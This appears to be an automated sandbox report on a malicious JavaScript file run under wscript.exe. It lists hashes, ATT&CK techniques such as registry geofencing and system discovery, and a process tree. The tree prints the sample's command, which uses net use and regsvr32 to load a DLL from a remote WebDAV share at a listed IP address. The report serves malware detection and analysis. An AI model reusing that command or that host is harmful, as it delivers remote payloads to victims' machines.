03a0adc8e7462f67a6ae10c4ff5ead6c63c65af0f46a64786c28c589512679b0

Analysis

max time kernel
137s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
22-07-2024 06:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1677329796220526916.js
Size

5KB
MD5

28102842db738348645fe4c7b466decd
SHA1

6762e9aad67cab001970ad32ae0b5cedc8f4a508
SHA256

639165e7f9e43ef75400c823681c44f119267e79265aa8576a3c50aac544da11
SHA512

1dd34f5da4ac17e51caa8b782ec404c0b68af2eda3937f21ffffbffbce8a9963e4942b9b81ba1c024aa0d019392a4b23613c13c8d38fa61dfdbfc291c067d5b6
SSDEEP

96:jF0xMxxJN1SyS6vnDpOyS+9td1x+P+Pw0+bukUUU6pGAkVVdw0+bukUUU6pGpvn4:jXvttx+PCw7buypGAkVVdw7buypGpXA

Score

7^/10

execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1204 wrote to memory of 2476	1204	wscript.exe	88
PID 1204 wrote to memory of 2476	1204	wscript.exe	88
PID 2476 wrote to memory of 3684	2476	cmd.exe	90
PID 2476 wrote to memory of 3684	2476	cmd.exe	90

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1677329796220526916.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\44781059432313.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Windows\system32\net.exe
    net use \\45.9.74.36@8888\davwwwroot\
    3⤵
    PID:3684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads